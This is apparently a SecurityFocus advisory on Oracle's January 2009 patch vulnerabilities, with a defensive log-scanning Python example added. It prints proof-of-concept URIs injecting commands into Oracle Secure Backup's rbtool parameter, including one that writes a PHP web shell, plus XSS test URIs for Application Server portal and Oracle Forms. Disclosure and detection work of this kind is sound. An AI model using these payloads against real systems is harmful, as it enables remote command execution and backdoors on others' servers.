Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

Some of these issues may not require specific exploit code and may be trivial to exploit.

Core Security Technologies has developed working commercial exploits for its CORE IMPACT product for the issues documented by CVE-2008-5449 and CVE-2008-5457. These exploits are not otherwise publicly available or known to be circulating in the wild.

The following proof-of-concept URIs are available for Oracle Secure Backup:

1. Create a file in the directory "c:\":

https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;

2. Create a PHP backdoor:

https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo
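For defenders, the following is an added example (not part of the original advisory and not vendor code) that scans web access-log lines for requests to login.php whose rbtool parameter carries a command, as in the URIs above. The log layout (Common Log Format), the sample lines and the character heuristic are assumptions made for this example; it only sees parameters sent in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed heuristic: whitespace, shell metacharacters, path separators or an
# executable name in rbtool suggest a command line rather than a tool name.
SUSPICIOUS_RE = re.compile(r'[;&|<>`"$\\/\s]|\.exe\b', re.I)

def rbtool_findings(log_line):
    """Return the suspicious, decoded rbtool values found in one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("/login.php"):
        return []
    # parse_qs percent-decodes and maps '+' to a space, so the check runs on
    # the value the application would receive, not on the encoded form.
    values = parse_qs(parts.query, keep_blank_values=True).get("rbtool", [])
    return [v for v in values if SUSPICIOUS_RE.search(v)]

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious rbtool value."""
    return [(n, v) for n, line in enumerate(lines, 1)
            for v in rbtool_findings(line)]

# Constructed sample log lines (addresses from the documentation range).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Feb/2009:10:00:00 +0000] "GET /login.php?clear=no'
    r'&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c'
    r'+echo+hello+world+%3E+c:\oracle.secure.backup.txt+; HTTP/1.1" 200 512',
    # Hypothetical benign value; real legitimate values are not given on the page.
    '192.0.2.11 - - [01/Feb/2009:10:00:05 +0000] '
    '"GET /login.php?clear=no&button=Logout&rbtool=sometool HTTP/1.1" 200 498',
    # Same parameter on a different script: out of scope for this check.
    '192.0.2.12 - - [01/Feb/2009:10:00:09 +0000] '
    '"GET /index.php?rbtool=cmd.exe HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: suspicious rbtool value: {value!r}")
```
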

The following example URI is available for the Oracle Application Server portal:

http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS
PORTAL&search_type=XSS

The following example URI is available for Oracle Forms:

http://www.example.com/ifcgi60.exe?form=XSS

The following exploits and proof of concept are available:


 

Copyright 2010, SecurityFocus